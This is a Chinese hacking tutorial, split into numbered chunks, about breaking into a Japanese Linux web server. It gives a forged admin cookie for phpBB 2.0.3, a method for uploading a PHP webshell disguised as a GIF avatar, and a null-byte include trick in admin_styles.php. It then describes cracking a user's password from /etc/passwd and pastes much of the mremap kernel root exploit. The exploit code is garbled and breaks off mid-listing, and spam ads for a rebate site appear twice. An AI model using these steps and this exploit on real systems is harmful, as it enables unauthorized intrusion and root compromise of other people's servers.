通过PHPBB拿日本linux主机系统权限

1、通过PHPBB拿日本linux主机系统权限 文/KYO 王智磊最近公司不是很忙，我和我同学（也是同事）对LINUX产生了极大的兴趣。于是都在虚拟机上装了red hat 9.0，基本操作熟悉了以后总感觉还是找个肉鸡好玩些，并且决定玩就要玩日本，大家都知道日本的WEB服务器最喜欢用*nix，个人感觉日本70%的网站都是用*nix+apache的构建方式。*这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。返利网,淘你喜欢,淘宝返利,淘宝返现购物。*当然那些溢出apache的0day的程序我们没有，所以决定还是先从WEBSHELL下手，然后想办法提升权限。怎么找目标呢？首先

2、可以考虑CGI漏洞，从这个地方入手肯定能找到很多口子，不过这个以后再说，今天就谈一下大家都熟悉的PHPBB这个论坛，因为最近暴出了不少关于这个论坛的漏洞，另外这个论坛应用也蛮广泛的。打开www.google.co.jp输入关键字powered by phpbb,出来很多，随便找到一个版本比较低的PHPBB论坛。地址为http:/www.*.org,可以看到是phpbb2.0.3,这样可以利用修改COOKIES进入后台。打开iecv.exe，编辑COOKIES，把vaule替换为a:2:s:11:autologinid;b:1;s:6:userid;s:1:2;然后保存以后，关掉网页，重新再打开

3、一次，就变成管理员了。点击下面的Go to Administration Panel 链接进入后台。现在我想大家关心的是怎么通过后台拿到一个WEBSHELL了。具体原理在这里我就不多说了，就是利用把%00进行url编码一次：%25%30%30，include成功被截断，那么我们可以利用./来调用文件。我们把phpshell代码保存为gif或其他图片格式，在通过论坛上传 然后利用构造 install_to 而被 include() 调用并执行。好了现在是找到上传的地方，进后台一看，发现他的个人头像上传是关闭的。把上面3个设置全部改为yes,头像大小默认为80 x80,这个最好也改大点，省的一会传

4、图片的时候因为太大不能传还要回来改。OK，准备工作做完后，来到首页，打开http:/www.*.org/forum/profile.php?mode=editprofile可以看到传图片的地方了，把我们精心构造的含有的图片test.gif做为头像传上去，并查看源代码记下来gif的路径。因为这个论坛比较特殊，那个图片目录不可写，我改到tmp目录，所以我这里路径为././././././././././tmp/dcf91e05431c8366e40a9.gif.然后我们用http:/www.*.org/ forum/admin/admin_styles.php?mode=addnew&instal

5、l_to=././././././././././tmp/dcf91e05431c8366e40a9.gif%25%30%30 &sid=d915682df5d0e9bfbd2b621828a0c0e5 在lanker的一句话马客户端提交就可以得到一个可爱的webshell了。*这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。返利网,淘你喜欢,淘宝返利,淘宝返现购物。*在这里要说一下的是最后的那个sid的值是你进后台页面的地址的后面的那个值复制过来的。好了，这个后门实在不是很好看，再传一个大一点的马吧。这个马看起来就舒服多了，并且执行命令也方便了。 现在有了webs

6、hell，执行命令id, uid=33(www-data) gid=33(www-data) groups=33(www-data), 看来权限是很小，接下来就是提升权限。先查看系统的版本，执行命令uname a Linux pod-133 2.4.22-1-686 #6 Sat Oct 4 14:09:08 EST 2003 i686 GNU/Linux。正好手上有一个这个版本的溢出程序，可以试一下。预先得知他开了22端口，现在的关键是能找到一个弱口令的帐号通过SSH登陆上去上传我的代码，编译然后执行。执行命令cat etc/passwd把执行命令的结果复制下来，然后分离用户，用流光跑了3个

7、小时终于得到一个FTP的弱口令帐户。打开SecureCRT，通过SSH登陆上去。当然权限仍然很低。进来以后用wget传我的溢出代码。/* * *mremap missing do_munmap return check kernel exploit * *gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte *./mremap_pte suid shell * *Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * *THIS PROGRAM

8、IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED AS IS *AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION *WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */#include #include #include #include #include #include #include #include #include #include #include #include #

9、define str(s) #s#define xstr(s) str(s)/this is for standard kernels with 3/1 split#define STARTADDR0x40000000#define PGD_SIZE(PAGE_SIZE * 1024)#define VICTIM(STARTADDR + PGD_SIZE)#define MMAP_BASE(STARTADDR + 3*PGD_SIZE)#define DSIGNALSIGCHLD#define CLONEFL(DSIGNAL|CLONE_VFORK|CLONE_VM)#define MREMA

10、P_MAYMOVE( (1UL) 0 )#define MREMAP_FIXED( (1UL) 1 )#define _NR_sys_mremap_NR_mremap/how many ld.so pages? this is the .text section length (like from cat /proc/self/maps) in pages#define LINKERPAGES0x14/suid victimstatic char *suid=/bin/ping;/shell to startstatic char *launch=/bin/bash;_syscall5(ulo

11、ng, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr);static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;static int i, pid=0;static char *e

12、nv2, *argv2;static ulong ret;/code to appear inside the suid imagestatic void suid_code(void)_asm_(callcallmen/setresuid(0, 0, 0), setresgid(0, 0, 0)jumpme:xorl%ebx, %ebxnxorl%ecx, %ecxnxorl%edx, %edxnxorl%eax, %eaxnmov$xstr(_NR_setresuid), %alnint$0x80nmov$xstr(_NR_setresgid), %alnint$0x80n/execve(

13、launch)popl%ebxnandl$0xfffff000, %ebxnxorl%eax, %eaxnpushl%eaxnmovl%esp, %edxnpushl%ebxnmovl%esp, %ecxnmov$xstr(_NR_execve), %alnint$0x80n/exitxorl%eax, %eaxnmov$xstr(_NR_exit), %alnint$0x80ncallme:jmpjumpmen);static int suid_code_end(int v)return v+1;static inline void get_esp(void)_asm_(movl%esp,

14、%eaxnandl$0xfffff000, %eaxnmovl%eax, %0n: : m(old_esp);static inline void cloneme(void)_asm_(pushanmovl $(xstr(CLONEFL), %ebxnmovl %esp, %ecxnmovl $xstr(_NR_clone), %eaxnint $0x80nmovl %eax, %0npopan: : m(pid);static inline void my_execve(void)_asm_(movl %1, %ebxnmovl %2, %ecxnmovl %3, %edxnmovl $xs

15、tr(_NR_execve), %eaxnint $0x80n: =a(ret): m(suid), m(argv), m(env);static inline void pte_populate(unsigned addr)unsigned r;char *ptr;memset(void*)addr, 0x90, PAGE_SIZE);r = (unsigned)suid_code_end) - (unsigned)suid_code);ptr = (void*) (addr + PAGE_SIZE);ptr -= r+1;memcpy(ptr, suid_code, r);memcpy(v

16、oid*)addr, launch, strlen(launch)+1);/hit VMA limit & populate PTEsstatic void exhaust(void)/mmap PTE donort = mmap(void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);if(MAP_FAILED=t)goto failed;/prepare shell code pagesfor(i=2; i65520 )printf(r

17、 MMAP #%d 0x%.8x - 0x%.8lx, cnt, base,base+PAGE_SIZE); fflush(stdout);base += PAGE_SIZE;prot = PROT_EXEC;cnt+;/move PTEs & populate page table cacheret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);if(-1=ret)goto failed;munmap(void*)MMAP_BASE,

18、old_esp-MMAP_BASE);t = mmap(void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);if(MAP_FAILED=t)goto failed;*t = *(unsigned *)old_esp);munmap(void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE);printf(n+ Successnn); fflush(stdout);return;fai

19、led:printf(n- Failedn); fflush(stdout);_exit(0);static inline void check_kver(void)static struct utsname un;int a=0, b=0, c=0, v=0, e=0, n;uname(&un);n=sscanf(un.release, %d.%d.%d, &a, &b, &c);if(n!=3 | a!=2) printf(n- invalid kernel version stringn);_exit(0);if(b=2) if(c=25)v=1;else if(b=3) if(c18 & c24)v=0, e=0;elsev=1, e=0;else if(b=5 & c=75)v=1, e=1;else if(b=6 & c1) suid=av1;if(ac2) launch=av2;argv0 = suid;get_esp();/mmap & clon